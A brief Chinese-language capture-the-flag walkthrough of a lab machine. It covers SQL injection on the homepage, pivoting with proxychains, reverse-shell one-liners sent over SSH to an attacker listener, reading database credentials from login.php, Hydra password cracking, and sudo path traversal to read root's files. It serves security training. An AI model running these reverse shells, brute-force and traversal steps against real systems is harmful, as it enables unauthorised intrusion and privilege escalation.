一、主机发现
二、渗透
1.首页有sql注入漏洞
抓包改包
2.到首页抓包改包放包得到
翻译
3.但是22端口被过滤了,所以需要代理,进行端口转发,输入语句下载代理工具
apt install proxychains
文件下载在/etc下
输入命令编辑文件
vim proxychains4.conf
输入语句
proxychains nmap -PN 192.168.x.x -p22 --min-rate 3000 -sT
proxychains ssh john@192.168.x.x
4.执行反弹语句,直接在ssh连接时执行
proxychains ssh john@192.168.x.x "sh -i >& /dev/tcp/192.168.x.x/4444 0>&1"
kali开启监听
nc -lvvp 4444
监听成功
三、提权
1.查看文件
cd /var/www
ls-al
cat login.php
2.查看数据库信息
发现数据库账号密码为root/root
进行数据库链接 mysql -u root -p
查看数据库 show databases; use SkyTech
查看数据标 show tables;
查看表中数据 select * from login;
3.将密码保存,使用九头蛇爆破
爆出密码
4.使用sara 在连接ssh时执行反弹语句
proxychains ssh sara@192.168.x.x"sh -i >& /dev/tcp/192.168.x.x/8080 0>&1"
mv .bashrc .bashrc.bak
kali开启监听
5.监听成功后查看文件,有flag文件
sudo /bin/ls /accounts/ ../../root
6.查看文件,发现密码
sudo /bin/cat /accounts/ ../../root/flag.txt
7.切换root用户,并输入刚刚爆出的密码,提权成功